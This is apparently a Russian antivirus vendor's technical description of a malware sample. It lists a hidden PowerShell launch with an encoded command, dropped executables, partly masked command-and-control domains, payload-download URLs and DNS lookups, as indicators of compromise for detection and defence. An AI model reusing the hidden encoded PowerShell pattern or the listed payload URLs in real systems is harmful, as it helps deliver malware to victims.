Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABQAHQAaABrAG8AaQBsAHAAbABxAHcAPQAnAEYAdQByAHEAZwBuAHQAawBkAGIAegBqAGUAJwA7ACQARQBqAHkAaAB0AGgAZABjAHYAeAB6ACAAPQAgACcANwA5ADMAJwA7ACQASgByAHIAcABzAHAAYQBwAHkAbgBmAD0AJwBTAHQAYgB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1580
- %TEMP%\1190116.cvr
- %HOMEPATH%\793.exe
- %HOMEPATH%\793.exe
- 'la####ichowkusa.com':80
- 'ad#####tycreative.com':80
- 'ba####planet.com':443
- 'he#####nlinea-chms.mx':80
- 'fo#####r.webinarbox.it':443
- http://www.la####ichowkusa.com/emailwishlist/g3B/
- http://ad#####tycreative.com/x92k25/387wj2/
- http://www.ad#####tycreative.com/x92k25/387wj2/
- http://he#####nlinea-chms.mx/wp-content/sW0yhVry/
- 'fo#####r.webinarbox.it':443
- DNS ASK la####ichowkusa.com
- DNS ASK ad#####tycreative.com
- DNS ASK ba####planet.com
- DNS ASK he#####nlinea-chms.mx
- DNS ASK fo#####r.webinarbox.it
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABQAHQAaABrAG8AaQBsAHAAbABxAHcAPQAnAEYAdQByAHEAZwBuAHQAawBkAGIAegBqAGUAJwA7ACQARQBqAHkAaAB0AGgAZABjAHYAeAB6ACAAPQAgACcANwA5ADMAJwA7ACQASgByAHIAcABzAHAAYQBwAHkAbgBmAD0AJwBTAHQAYgB...' (со скрытым окном)